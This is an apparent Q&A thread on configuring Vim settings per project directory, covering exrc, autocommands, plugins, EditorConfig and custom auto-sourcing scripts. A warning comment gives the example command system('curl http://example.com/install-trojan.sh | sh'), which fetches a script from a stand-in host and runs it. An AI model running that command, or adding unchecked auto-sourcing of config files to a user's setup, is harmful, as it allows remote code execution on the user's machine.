# Applying settings to a directory tree only

Tags: vimrc, filesystem

At my work we use a standard `ts` of 2; my personal preference is 4, which is what I use for my hobby projects, and this other project we inherited has the convention of `ts=8`.

There are also some other settings I want to set on a project basis (for example folding). Basing these settings on the filetype or auto-detecting them based on what the file uses are *not* good options, since I want to respect each project's conventions.

Can I make Vim use a settings file that applies to a project (everything in a directory tree) without adding a modeline to all the files?

Comment: possible duplicate of [How do I make Vim adapt to the current indenting style of the file I'm editing?](http://vi.stackexchange.com/questions/52/how-do-i-make-vim-adapt-to-the-current-indenting-style-of-the-file-im-editing)

Answer (score 26, accepted):

There are a few lightweight ways to do this.

1. **Check for a file of given name and source it**

   ```
   if filereadable(".vimscript_file")
       so .vimscript_file
   endif
   ```

   The file is hidden in the example but that's optional.
2. **Local `.vimrc` files** (not the same as the plugin)

   ```
   set exrc
   ```

   This is similar to 1. but the file will be called ".vimrc".

   A common suggestion to accompany this is to use

   ```
   set secure
   ```

   which prevents a `.vimrc` file from doing potentially dangerous things like running
   shell commands. The idea is that you wouldn't want to have vim read a `.vimrc` file written by someone else that does something nasty.
3. **Autocommands that check the current path**

   ```
   au BufNewFile,BufRead *path-possibly-using-globbing setlocal setting=value
   ```

   This is the option I use. I don't change much between different projects so YMMV but if you just want to do one or two things based on path and keep it in your `.vimrc` this is nice and simple.

Comment: Note that option 1 and 2 has the same limitation described in [this comment](https://vi.stackexchange.com/q/77#comment3315_3103): it doesn't recursively apply to subdirectories.

Answer (score 15):

I use [localvimrc](http://www.vim.org/scripts/script.php?script_id=441) for this purpose.

Put a `.lvimrc` with your project settings inside your project and these settings will override settings in `.vimrc`.

By default, you will be asked if you want to source this file, eg:

```
localvimrc: source /home/martin/code/.lvimrc? ([y]es/[n]o/[a]ll/[q]uit)
```

This is to prevent sourcing random (untrusted) vimrc files. If you find this annoying, you can setup a whitelist of `.lvimrc` files with `g:localvimrc_whitelist`:

```
let g:localvimrc_whitelist = '/home/martin/code/.lvimrc'
```

Or you can just disable asking for confirmation completely with `set g:localvimrc_ask = 0`. This is not recommended, though.

Answer (score 5):

There is the [Editor Config](http://editorconfig.org) project which allows you to define project level configurations like tabstop settings along with new line styles and other things. There are many plugging for all sorts of editors including [vim](https://github.com/editorconfig/editorconfig-vim#readme). It also allows you to define settings for different file types.

```
# EditorConfig is awesome: http://EditorConfig.org

# top-most EditorConfig file
root = true

# Unix-style newlines with a newline ending every file
[*]
end_of_line = lf
insert_final_newline = true

# Matches multiple files with brace expansion notation
# Set default charset
[*.{js,py}]
charset = utf-8

# 4 space indentation
[*.py]
indent_style = space
indent_size = 4

# Tab indentation (no size specified)
[*.js]
indent_style = tab

# Indentation override for all JS under lib directory
[lib/**.js]
indent_style = space
indent_size = 2

# Matches the exact files either package.json or .travis.yml
[{package.json,.travis.yml}]
indent_style = space
indent_size = 2
```

Answer (score 5):

### Central configuration

If it's okay to configure the specific commands / local exceptions centrally, you can put such autocmds into your `~/.vimrc`:

```
:autocmd BufRead,BufNewFile /path/to/dir/* setlocal ts=4 sw=4
```

It is important to use `:setlocal` instead of `:set`, and likewise `:map <buffer> ...` and `:command! -buffer ...`.

On the other hand, if you want the specific configuration stored with the project (and don't want to embed this in all files via *modelines*), you have the following two options:

### Local config with built-in functionality

If you always start Vim from the project root directory, the built-in

```
:set exrc
```

enables the reading of a `.vimrc` file from the current directory. You can place the `:set ts=4 sw=4` commands in there.

### Local config through plugin

Otherwise, you need the help of a plugin; there are several on vim.org; I can recommend the [localrc plugin](http://www.vim.org/scripts/script.php?script_id=3393), which even allows local filetype-specific configuration.

<sup>Note that reading configuration from the file system has security implications; you may want to `:set secure`.</sup>

Comment: Note that `.exrc` are extremely limited: the *project* notion stops at the current directory, i.e. files in subdirectories don't belong to the project.

Answer (score 0):

I wrote this and added it to my .vimrc to allow me to place .vimsettings files in projects and sub-projects.

```
" Search for any .vimsettings files in the path to the file.
" Source them if you find them.
function! ApplyLocalSettings(dirname)
    " Don't try to walk a remote directory tree -- takes too long, too many
    " what if's
    let l:netrwProtocol = strpart(a:dirname, 0, stridx(a:dirname, "://"))
    if l:netrwProtocol != ""
        return
    endif

    " Convert windows paths to unix style (they still work)
    let l:curDir = substitute(a:dirname, "\\", "/", "g")
    let l:parentDir = strpart(l:curDir, 0, strridx(l:curDir, "/"))
    if isdirectory(l:parentDir)
        " Recursively walk to the top of the path
        call ApplyLocalSettings(l:parentDir)
    endif

    " Now walk back down the path and source .vimsettings as you find them. This
    " way child directories can 'inherit' from their parents
    let l:settingsFile = a:dirname . "/.vimsettings"
    if filereadable(l:settingsFile)
        exec ":source " . l:settingsFile
    endif
endfunction
autocmd! BufEnter * call ApplyLocalSettings(expand("<afile>:p:h"))
```

Comment: While this works, it can be considered dangerous since you're just sourcing a file, and executing *all* commands in it (including shell commands, such as `system('curl http://example.com/install-trojan.sh | sh')` ...

Answer (score 0):

I wanted this so I just implemented it locally. I'm not as concerned with "executing random code" but this may work for simple needs. Adjust filenames as necessary.

```
let s:this_file = expand("<sfile>")
autocmd BufEnter * call LoadLocalVimrc(expand("<afile>"))

function! LoadLocalVimrc(filename)
    let l:filepath = fnamemodify(a:filename, ':h')
    let l:file = findfile("local.vimrc", l:filepath . ";/")
    if l:file != ''
        execute "source" l:file
        execute "nnoremap <F8> :$tabe " . s:this_file . "<CR>:sp " . l:file . "<CR>"
    endif
endfunction
```

This `local.vimrc` is actually a symlink to a file in my substantial collection of per-company vimrc files which I can keep in source control elsewhere, which makes it easy to move my whole config to other machines or if I visit a company on-site or something. Cascading configs could be used but in practice I don't need that functionality. I also wire up <kbd>F8</kbd> to open that found file and my "main" `.vimrc` in a new tab...

Inside those local configs, since they're parsed for every opened file, be sure to set you mappings and settings to buffer-local. E.g.

```
nnoremap <buffer> <F3> :silent !p4 edit %<CR>:w!<CR>:e<CR>
nnoremap <buffer> <S-F3> :w<CR>:silent !p4 add %<CR>
nnoremap <buffer> <C-F3> :silent !p4 diff %<CR>
nnoremap <buffer> <S-C-F3> :silent !p4vc timelapse %<CR>

setlocal textwidth=101
setlocal noexpandtab
setlocal shiftwidth=4
setlocal tabstop=4
setlocal cinoptions=:0g0(0l1j0*700s+s
```